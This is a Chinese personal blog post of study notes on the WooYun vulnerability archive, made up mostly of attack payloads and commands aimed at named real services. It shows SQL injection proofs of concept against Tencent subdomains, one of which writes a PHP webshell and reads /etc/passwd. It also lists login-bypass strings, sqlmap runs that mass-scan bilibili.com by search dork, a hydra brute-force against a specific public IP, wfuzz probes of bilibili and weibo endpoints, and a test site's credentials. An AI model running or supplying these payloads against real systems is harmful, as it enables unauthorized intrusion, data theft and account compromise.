<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="笔记,渗透测试,wooyun," />





  <link rel="alternate" href="/atom.xml" title="Mugen" type="application/atom+xml" />






<meta name="description" content="前言之前挖洞还是差了点，本来是想混个营长的，死活挖不出最后一个中危。难受是肯定的，可是也暴露了我的一些明显的不足，太依靠运气，应该静下心来好好学习一下了。这个文章长期更新吧，算给自己做做长期的笔记。 安利一个镜像 https://shuimugan.com ps:最后还是混到了营长 没想到审了这么久一个洞感谢，Art3mis师傅千里送payload。 正文11-07SQL注入学习腾讯某分站SQL注">
<meta name="keywords" content="笔记,渗透测试,wooyun">
<meta property="og:type" content="article">
<meta property="og:title" content="读乌云漏洞库">
<meta property="og:url" content="http://legoc.gitee.io/2018/11/06/读乌云漏洞库/index.html">
<meta property="og:site_name" content="Mugen">
<meta property="og:description" content="前言之前挖洞还是差了点，本来是想混个营长的，死活挖不出最后一个中危。难受是肯定的，可是也暴露了我的一些明显的不足，太依靠运气，应该静下心来好好学习一下了。这个文章长期更新吧，算给自己做做长期的笔记。 安利一个镜像 https://shuimugan.com ps:最后还是混到了营长 没想到审了这么久一个洞感谢，Art3mis师傅千里送payload。 正文11-07SQL注入学习腾讯某分站SQL注">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2019-03-30T03:05:39.308Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="读乌云漏洞库">
<meta name="twitter:description" content="前言之前挖洞还是差了点，本来是想混个营长的，死活挖不出最后一个中危。难受是肯定的，可是也暴露了我的一些明显的不足，太依靠运气，应该静下心来好好学习一下了。这个文章长期更新吧，算给自己做做长期的笔记。 安利一个镜像 https://shuimugan.com ps:最后还是混到了营长 没想到审了这么久一个洞感谢，Art3mis师傅千里送payload。 正文11-07SQL注入学习腾讯某分站SQL注">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":true,"scrollpercent":true,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://legoc.gitee.io/2018/11/06/读乌云漏洞库/"/>





  <title>读乌云漏洞库 | Mugen</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Mugen</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">lego's blog</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-links">
          <a href="/links" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-flag"></i> <br />
            
            朋友
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于我
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://legoc.gitee.io/2018/11/06/读乌云漏洞库/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="lego">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="https://raw.githubusercontent.com/legoc/legoc.github.io/master/about/index/baye.png">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Mugen">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">读乌云漏洞库</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2018-11-06T22:44:17+08:00">
                2018-11-06
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/笔记/" itemprop="url" rel="index">
                    <span itemprop="name">笔记</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="page-pv"><i class="fa fa-file-o"></i> 阅读次数
            <span class="busuanzi-value" id="busuanzi_value_page_pv" ></span>
            </span>
          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>之前挖洞还是差了点，本来是想混个营长的，死活挖不出最后一个中危。难受是肯定的，可是也暴露了我的一些明显的不足，太依靠运气，应该静下心来好好学习一下了。这个文章长期更新吧，算给自己做做长期的笔记。</p>
<p>安利一个镜像 <a href="https://shuimugan.com" target="_blank" rel="noopener">https://shuimugan.com</a></p>
<p>ps:最后还是混到了营长 没想到审了这么久一个洞感谢，Art3mis师傅千里送payload。</p>
<h1 id="正文"><a href="#正文" class="headerlink" title="正文"></a>正文</h1><h2 id="11-07"><a href="#11-07" class="headerlink" title="11-07"></a>11-07</h2><h3 id="SQL注入学习"><a href="#SQL注入学习" class="headerlink" title="SQL注入学习"></a>SQL注入学习</h3><p>腾讯某分站SQL注射-直接绕过WAF <a href="https://bugs.shuimugan.com/bug/view?bug_no=90369" target="_blank" rel="noopener">https://bugs.shuimugan.com/bug/view?bug_no=90369</a></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">http://fun.kid.qq.com/funshop/testfunshow/ebookController/update_assets_list?campaignID=0&amp;etclass=0&amp;formatID=50&quot;</span><br><span class="line">formatID 存在注射。</span><br><span class="line">利用双重urlencode 直接绕过 waf 拦截。</span><br></pre></td></tr></table></figure>
<p>腾讯QQ彩票某处SQL注射-可看到中奖记录 <a href="https://bugs.shuimugan.com/bug/view?bug_no=86707" target="_blank" rel="noopener">https://bugs.shuimugan.com/bug/view?bug_no=86707</a></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">彩票中奖记录查询处：</span><br><span class="line">http://888.sports.qq.com/tws/centerrecord/GetCenterRecord?mod=award&amp;pagesize=10&amp;page=0&amp;type=jczq&amp;days=30&amp;_=14182187</span><br><span class="line">type 参数存在SQL注入。</span><br><span class="line">POC:</span><br><span class="line">mod=award&amp;pagesize=10&amp;page=0&amp;type=dllc&apos;)||(true) limit 30%23&amp;days=30&amp;_=14182187</span><br></pre></td></tr></table></figure>
<p>腾讯某分站SQL爆错注入 <a href="https://bugs.shuimugan.com/bug/view?bug_no=70666" target="_blank" rel="noopener">https://bugs.shuimugan.com/bug/view?bug_no=70666</a></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">POC:</span><br><span class="line">http://ifzq.finance.qq.com/other/tips/modall/mod?_callback=NEWSTOCKPROXY14069079458626&amp;uin=xxxxx&amp;code=sh603111&amp;high=0.00&amp;low=0.00&amp;updown=-1.00-0 and UpdateXML(1,CONCAT(0x5b,mid((SELECT user()),1,32),0x5d),1)&amp;type=2010</span><br></pre></td></tr></table></figure>
<p>状态码盲注<a href="https://bugs.shuimugan.com/bug/view?bug_no=67581" target="_blank" rel="noopener">https://bugs.shuimugan.com/bug/view?bug_no=67581</a></p>
<p>腾讯某分站一个常规注入 <a href="https://bugs.shuimugan.com/bug/view?bug_no=70398" target="_blank" rel="noopener">https://bugs.shuimugan.com/bug/view?bug_no=70398</a></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://admin.comic.qq.com/site/getScore?jsonpCallbackParam=initStarSuccessCallback&amp;eid=278 and UpdateXML(1,CONCAT(0x5b,mid((SELECT database()),1,32),0x5d),1)#&amp;ajax=true&amp;_=1406730256944</span><br></pre></td></tr></table></figure>
<p>QQ某站点MySQL注射(支持union)</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">参数f_uid可注入。MySQL union注入。 </span><br><span class="line">f_channel_name=test&amp;f_uid=-1&apos; OR ascii(mid(user()from(1)for(1)))!=123 AND 1=1 --</span><br></pre></td></tr></table></figure>
<p>从一个phpinfo到一次半途而废的腾讯内网漫游之旅</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">http://isux.oa.com/sola/server/showPic.php</span><br><span class="line">user=1&apos; union select 1,&quot;&lt;?php system(&apos;ps aux&apos;)?&gt;&quot;,load_file(&apos;/etc/passwd&apos;),4,5,6,7,8,9,0 into outfile &quot;/data/imgcache/htdocs/sola/public/1k23hj1k22b.php&quot; -- ;</span><br></pre></td></tr></table></figure>
<h3 id="小结"><a href="#小结" class="headerlink" title="小结"></a>小结</h3><p>问了一下带头老哥大师傅，他说他的SQL注入是手注找测试点的，意味着这个细心和耐心是很重要了，自己和玩XSS一样老老实实一个个测吧，看之前大佬们的总结，SQL注入的挖掘重点在于闭合语句。</p>
<p>盲注的语句找注入点看来是个蛮不错的选择总结几个闭合方式</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">?id=1&apos; and if(1,sleep(3),null) --+</span><br><span class="line">or 1=1--+ </span><br><span class="line"></span><br><span class="line">&apos;or 1=1--+ </span><br><span class="line"></span><br><span class="line">&quot;or 1=1--+ </span><br><span class="line"></span><br><span class="line">)or 1=1--+ </span><br><span class="line"></span><br><span class="line">&apos;)or 1=1--+ </span><br><span class="line"></span><br><span class="line">&quot;) or 1=1--+ </span><br><span class="line"></span><br><span class="line">&quot;))or 1=1--+</span><br></pre></td></tr></table></figure>
<p>绕过登入</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">admin&apos; --</span><br><span class="line">admin&apos; #</span><br><span class="line">admin&apos;/*</span><br><span class="line">&apos; or 1=1--</span><br><span class="line">&apos; or 1=1#</span><br><span class="line">&apos; or 1=1/*</span><br><span class="line">&apos;) or &apos;1&apos;=&apos;1--</span><br><span class="line">&apos;) or (&apos;1&apos;=&apos;1--</span><br></pre></td></tr></table></figure>
<p>实践规则总结</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&apos;)||(true) limit 30%23</span><br><span class="line">and UpdateXML(1,CONCAT(0x5b,mid((SELECT user()),1,32),0x5d),1)&amp;type=2010</span><br><span class="line">and UpdateXML(1,CONCAT(0x5b,mid((SELECT database()),1,32),0x5d),1)#</span><br><span class="line">&apos; OR ascii(mid(user()from(1)for(1)))!=123 AND 1=1 --</span><br></pre></td></tr></table></figure>
<h3 id="SQLMAP小结"><a href="#SQLMAP小结" class="headerlink" title="SQLMAP小结"></a>SQLMAP小结</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">--batch 	从不询问用户输入,使用所有默认配置。</span><br><span class="line">-l LIST 从Burp或WebScarab代理的日志中解析目标。</span><br><span class="line">-r REQUESTFILE 从一个文件中载入HTTP请求。</span><br><span class="line">-–count    表中数据条数</span><br><span class="line">–start 1 –stop 20 #列出指定字段，列出20 条</span><br></pre></td></tr></table></figure>
<p>好用的语句例如</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">基于google爬虫的sql注入 python sqlmap.py -g &quot;site:bilibili.com inurl:.php?&quot; --batch --random-agent</span><br><span class="line">防止进局子的 python sqlmap.py -u &quot;http://xxxxx/sqli-labs-master/Less-2/?id=1&quot; --count -D &quot;mysql&quot;</span><br></pre></td></tr></table></figure>
<p>python sqlmap.py -g “site:xinlingshou.cn  inurl:.php?” –batch –random-agent</p>
<p>python sqlmap.py -u “<a href="http://www.mei.com/home/search.html?q=1&amp;filter=default&amp;pageIndex=1&quot;" target="_blank" rel="noopener">http://www.mei.com/home/search.html?q=1&amp;filter=default&amp;pageIndex=1&quot;</a> –random-agent</p>
<p><a href="http://www.mei.com/home/search.html?q=1&amp;filter=default&amp;pageIndex=1" target="_blank" rel="noopener">http://www.mei.com/home/search.html?q=1&amp;filter=default&amp;pageIndex=1</a></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">ASRC TEST</span><br><span class="line">https://bsstest1.yyzws.com/leaf_manager_web/static/html/login.html?    admin 123456</span><br><span class="line">101.37.224.91</span><br></pre></td></tr></table></figure>
<h3 id="sqlmapapi"><a href="#sqlmapapi" class="headerlink" title="sqlmapapi"></a>sqlmapapi</h3><p>扫描结果在/scan/taskid/data下查看</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://xxxx:8888/scan/49e710973a44ffd2/data</span><br></pre></td></tr></table></figure>
<h3 id="url跳转"><a href="#url跳转" class="headerlink" title="url跳转"></a>url跳转</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">https://shuimugan.com/bug/view?bug_no=170508     js控制二维码跳转地址 以及绕过</span><br><span class="line">poc http://vac.qq.com/common/pc/pc.html?title=乌云来啦&amp;acturl=http://banfei.zhongan.com:@wooyun.org/</span><br></pre></td></tr></table></figure>
<p>QQ一个强制聊天漏洞</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://shuimugan.com/bug/view?bug_no=167168  	 mqqwpa:// 协议没有加密，可以通过 mqqwpa://im/chat?chat_type=wpa&amp;uin=QQ号码&amp;version=1&amp;src_type=web&amp;web_src=&amp;name=0</span><br></pre></td></tr></table></figure>
<h3 id="扫描器总结"><a href="#扫描器总结" class="headerlink" title="扫描器总结"></a>扫描器总结</h3><h4 id="nmap"><a href="#nmap" class="headerlink" title="nmap"></a>nmap</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">nmap -v -sn -PE -n --min-hostgroup 1024 --min-parallelism 1024 -oX nmap_output.xml www.lijiejie.com/16</span><br><span class="line">nmap -sP --min-hostgroup 1024 --min-parallelism 1024 -iL ip.txt -oG ip_output1113.txt</span><br></pre></td></tr></table></figure>
<p>-sn    不扫描端口，只ping主机</p>
<p>-PE   通过ICMP echo判定主机是否存活</p>
<p>-n     不反向解析IP地址到域名</p>
<p>–min-hostgroup 1024    最小分组设置为1024个IP地址，当IP太多时，nmap需要分组，然后串行扫描</p>
<p>–min-parallelism 1024  这个参数非常关键，为了充分利用系统和网络资源，我们将探针的数目限定最小为1024</p>
<p>-oX nmap_output.xml    将结果以XML格式输出，文件名为nmap_output.xml</p>
<p>一旦扫描结束，解析XML文档即可得到哪些IP地址是存活的。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">nmap -sS -p 1-65535 -v 14.116.140.49</span><br><span class="line">参数：</span><br><span class="line">-sS    TCP SYN扫描    nmap -sS 192.168.1.254   </span><br><span class="line">-P     指定端口扫描   nmap -sS -P 1-65535 192.168.1.254</span><br><span class="line">-V     详细信息       nmap -V -sS 192.168.1.254</span><br></pre></td></tr></table></figure>
<h4 id="masscan"><a href="#masscan" class="headerlink" title="masscan"></a>masscan</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">masscan --ports 1-65535 14.116.143.118 --rate 1000 --wait 1</span><br></pre></td></tr></table></figure>
<h4 id="hydra爆破"><a href="#hydra爆破" class="headerlink" title="hydra爆破"></a>hydra爆破</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">-R   根据上一次进度继续破解</span><br><span class="line">-S   使用SSL协议连接</span><br><span class="line">-s   指定端口</span><br><span class="line">-l   指定用户名</span><br><span class="line">-L   指定用户名字典(文件)</span><br><span class="line">-p   指定密码破解</span><br><span class="line">-P   指定密码字典(文件)</span><br><span class="line">-e   空密码探测和指定用户密码探测(ns)</span><br><span class="line">-M   &lt;FILE&gt;指定目标列表文件一行一条</span><br><span class="line">-f   在使用-M参数以后，找到第一对登录名或者密码的时候中止破解。</span><br><span class="line">-C   用户名可以用:分割(username:password)可以代替-l username -p password</span><br><span class="line">-o   &lt;FILE&gt;输出文件</span><br><span class="line">-t   指定多线程数量，默认为16个线程</span><br><span class="line">-w   TIME 设置最大超时的时间，单位秒，默认是30s</span><br><span class="line">-vV  显示详细过程</span><br><span class="line">server     目标IP</span><br><span class="line">service    指定服务名(telnet ftp pop3 mssql mysql ssh ssh2......)</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">hydra -L uname.txt -P pwd.txt 192.168.1.3 telnet</span><br><span class="line">hydra -l root -P oracle_logins.txt -t 5 -vV -o oracle_passwords.txt -s 30002 -e ns 121.41.173.190 mysql</span><br></pre></td></tr></table></figure>
<h4 id="patator"><a href="#patator" class="headerlink" title="patator"></a>patator</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">host=FILE0 user=FILE1 password=FILE2 0=hosts.txt 1=logins.txt 2=passwords.txt</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python patator.py telnet_login host=10.10.12.77 user=FILE=0 0=3389u.txt password=FILE1 1=3389d.txt</span><br></pre></td></tr></table></figure>
<h4 id="dirs3arch目录爆破"><a href="#dirs3arch目录爆破" class="headerlink" title="dirs3arch目录爆破"></a>dirs3arch目录爆破</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 dirs3arch.py -u https://gjapplog.uc.cn/ -e php</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python sqlmap.py -u &quot;http://g.1905.com:80/index.php?m=Home&amp;c=Newsdetail&amp;a=commentlist&quot; --data=&quot;p=1&amp;id=1395&amp;type=2&quot;</span><br></pre></td></tr></table></figure>
<h4 id="Wfuzz"><a href="#Wfuzz" class="headerlink" title="Wfuzz"></a>Wfuzz</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">wfuzz -w /home/ubuntu/lego/dict/parm.txt --hc 404 &apos;http://api.bilibili.com/x/v2/FUZZ?type=1&amp;oid=512345&apos;</span><br><span class="line">wfuzz -w /home/ubuntu/lego/dict/parm.txt --hh 30 &apos;http://api.sc.weibo.com/?FUZZ&apos;</span><br><span class="line">wfuzz -w /home/ubuntu/lego/dict/parm.txt --hc 404 &apos;http://go.chaohua.weibo.com/?FUZZ&apos;</span><br><span class="line">wfuzz -w /home/ubuntu/lego/dict/parm.txt --hc 404 &apos;http://dataflow.biliapi.com/s/FUZZ&apos;</span><br></pre></td></tr></table></figure>
<h4 id="java项目打包成jar"><a href="#java项目打包成jar" class="headerlink" title="java项目打包成jar"></a>java项目打包成jar</h4><p><a href="https://www.cnblogs.com/tianyanzhi/p/8067239.html" target="_blank" rel="noopener">https://www.cnblogs.com/tianyanzhi/p/8067239.html</a></p>

      
    </div>
    
    
    

    

    

    
      <div>
        <ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者：</strong>
    lego
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="http://legoc.gitee.io/2018/11/06/读乌云漏洞库/" title="读乌云漏洞库">http://legoc.gitee.io/2018/11/06/读乌云漏洞库/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>
    本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明出处！
  </li>
</ul>

      </div>
    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/笔记/" rel="tag"># 笔记</a>
          
            <a href="/tags/渗透测试/" rel="tag"># 渗透测试</a>
          
            <a href="/tags/wooyun/" rel="tag"># wooyun</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/11/01/初试Vulhub/" rel="next" title="初试Vulhub">
                <i class="fa fa-chevron-left"></i> 初试Vulhub
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/11/15/巧用粘滞键-随时脱离与连接教师机/" rel="prev" title="巧用粘滞键-随时脱离与连接教师机">
                巧用粘滞键-随时脱离与连接教师机 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
 <div id="gitalk-container"></div>
 
  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="https://raw.githubusercontent.com/legoc/legoc.github.io/master/about/index/baye.png"
                alt="lego" />
            
              <p class="site-author-name" itemprop="name">lego</p>
              <p class="site-description motion-element" itemprop="description">从小菜鸡往大菜鸡成长的路上...</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">41</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">8</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">63</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#前言"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#正文"><span class="nav-number">2.</span> <span class="nav-text">正文</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#11-07"><span class="nav-number">2.1.</span> <span class="nav-text">11-07</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#SQL注入学习"><span class="nav-number">2.1.1.</span> <span class="nav-text">SQL注入学习</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#小结"><span class="nav-number">2.1.2.</span> <span class="nav-text">小结</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#SQLMAP小结"><span class="nav-number">2.1.3.</span> <span class="nav-text">SQLMAP小结</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#sqlmapapi"><span class="nav-number">2.1.4.</span> <span class="nav-text">sqlmapapi</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#url跳转"><span class="nav-number">2.1.5.</span> <span class="nav-text">url跳转</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#扫描器总结"><span class="nav-number">2.1.6.</span> <span class="nav-text">扫描器总结</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#nmap"><span class="nav-number">2.1.6.1.</span> <span class="nav-text">nmap</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#masscan"><span class="nav-number">2.1.6.2.</span> <span class="nav-text">masscan</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#hydra爆破"><span class="nav-number">2.1.6.3.</span> <span class="nav-text">hydra爆破</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#patator"><span class="nav-number">2.1.6.4.</span> <span class="nav-text">patator</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#dirs3arch目录爆破"><span class="nav-number">2.1.6.5.</span> <span class="nav-text">dirs3arch目录爆破</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Wfuzz"><span 